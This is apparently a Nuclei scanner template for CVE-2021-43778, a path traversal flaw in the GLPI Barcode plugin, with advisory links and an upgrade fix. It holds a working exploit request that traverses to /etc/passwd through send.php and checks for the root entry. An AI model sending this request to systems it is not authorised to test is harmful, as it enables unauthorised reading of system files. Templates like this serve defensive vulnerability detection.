41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
id: CVE-2021-43778
|
|
|
|
info:
|
|
name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
|
|
author: cckuailong
|
|
severity: high
|
|
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
|
|
reference:
|
|
- https://github.com/AK-blank/CVE-2021-43778
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-43778
|
|
- https://github.com/pluginsGLPI/barcode/security/advisories/GHSA-2pjh-h828-wcw9
|
|
- https://github.com/pluginsGLPI/barcode/releases/tag/2.6.1
|
|
remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-43778
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:*
|
|
epss-score: 0.77314
|
|
tags: glpi,cve,cve2021,lfi,plugin,traversal
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
# Enhanced by mp on 2022/02/28
|